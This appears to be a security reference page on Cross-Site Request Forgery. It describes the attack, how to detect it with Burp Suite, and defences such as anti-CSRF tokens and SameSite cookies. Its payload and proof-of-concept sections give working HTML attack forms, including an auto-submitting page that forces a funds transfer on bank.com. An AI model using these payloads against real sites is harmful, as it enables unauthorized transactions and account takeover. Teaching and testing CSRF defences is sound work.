Home / Web Security / CSRF
Medium Severity | OWASP A01:2021

🟡 Cross-Site Request Forgery (CSRF)

CWECWE-352: CSRF
OWASPA01:2021 Broken Access Control
CVSS 3.16.5 (Medium)
CAPECCAPEC-62, 111
Attack VectorNetwork
Privilege RequiredUser Session

🧠 Description

What is CSRF?

Cross-Site Request Forgery (CSRF) forces authenticated users to perform unwanted actions on a web application. The attacker cannot see the response, but can trigger state-changing actions.

CSRF allows attackers to:
  • Change user password
  • Transfer funds
  • Modify account settings
  • Delete data
  • Make purchases

🏷️ Classification

  • Type: Cross-Site Request Forgery (CWE-352)
  • OWASP: A01:2021 - Broken Access Control
  • Types: GET-based CSRF, POST-based CSRF, Stored CSRF

🎯 Attack Surface

  • ✅ User profile updates
  • ✅ Password change forms
  • ✅ Money transfers
  • ✅ Email settings
  • ✅ Delete operations

⚠️ Preconditions

  • User is authenticated
  • No CSRF token on requests
  • Session cookies not protected
  • Attacker can trick user to visit malicious page

🔍 Detection

  • Check if forms have CSRF tokens
  • Test state-changing actions without tokens
  • Check SameSite cookie attribute

🔧 Burp Suite Workflow

  1. Capture a state-changing request
  2. Remove CSRF token parameter
  3. Replay request without token
  4. If succeeds - vulnerable to CSRF

⚙️ Tool Automation

CSRF Scanner

Burp CSRF Scanner

OWASP ZAP

CSRF detection

💣 Basic Payloads

🔧 GET-based CSRF
<img src="http://target.com/change-email?new=test@attacker.com">
<script>window.location='http://target.com/delete?id=123'</script>
🔧 POST-based CSRF
<form action="http://target.com/transfer" method="POST"><input type="hidden" name="to" value="attacker"><input type="hidden" name="amount" value="10000"></form>

📝 Proof of Concept

# Malicious page hosted by attacker
<html>
<body>
<form action="https://bank.com/transfer" method="POST" id="csrf">
<input type="hidden" name="to" value="attacker">
<input type="hidden" name="amount" value="10000">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>

💥 Impact Analysis

Severity: MEDIUM (CVSS 6.5)
  • Account takeover
  • Unauthorized transactions
  • Data modification
  • Reputation damage

🛡️ Mitigation

✅ CSRF Tokens: Use anti-CSRF tokens on all state-changing requests

✅ SameSite Cookies: Set SameSite=Strict or Lax

✅ Referer Validation: Validate Origin/Referer headers

🏰 Advanced Mitigation

# Set SameSite cookie
Set-Cookie: session=abc; SameSite=Strict; Secure

# Use SameSite=Strict or SameSite=Lax

📊 Monitoring & Detection

  • Monitor for CSRF token validation failures
  • Alert on requests without proper tokens

🔐 Security Controls

ControlImplementation
CSRF TokenPer-request or per-session tokens
SameSite CookiesSet SameSite=Strict
Custom HeaderRequire custom header for API

🔓 Bypass Techniques

Session fixation
Cross-site scripting to steal token
Clickjacking combined with CSRF

🛠️ Tools

Burp CSRF Scanner

Auto-detect CSRF

CSRF PoC Generator

Generate attack pages

📚 References

🔄 Retest Steps

StepAction
1Add CSRF tokens
2Re-test without token
3Verify SameSite cookie

⚙️ Detection Logic

Check for CSRF token presence, validate SameSite attribute.

🔎 Threat-Hunting

IOCs: CSRF tokens missing, no SameSite attribute.

🛡️ Defensive

Browser-level protection, CSP directives.

Back to Web Security